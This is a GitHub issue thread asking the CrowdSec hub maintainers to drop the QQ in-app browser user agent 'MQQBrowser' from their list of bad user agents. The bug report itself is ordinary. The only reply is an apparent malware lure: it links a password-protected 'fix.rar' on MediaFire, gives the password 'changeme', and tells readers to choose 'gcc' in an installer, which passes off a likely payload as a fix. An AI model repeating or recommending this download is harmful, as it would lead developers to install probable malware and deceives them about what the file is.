### ISSUE TITLE
[sec-list] `MQQBrowser` is recognized as Bad UA

### ISSUE THREAD

**Issue by System233** [crowdsecurity/hub#1101]
**Describe the bug**
Same as #crowdsecurity/sec-lists/pull/48 
`MQQBrowser` is the UA of the built-in browser of a social application called QQ. Like `MicroMessenger`, they are both owned by Tencent.
Please remove it from the sec-list.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
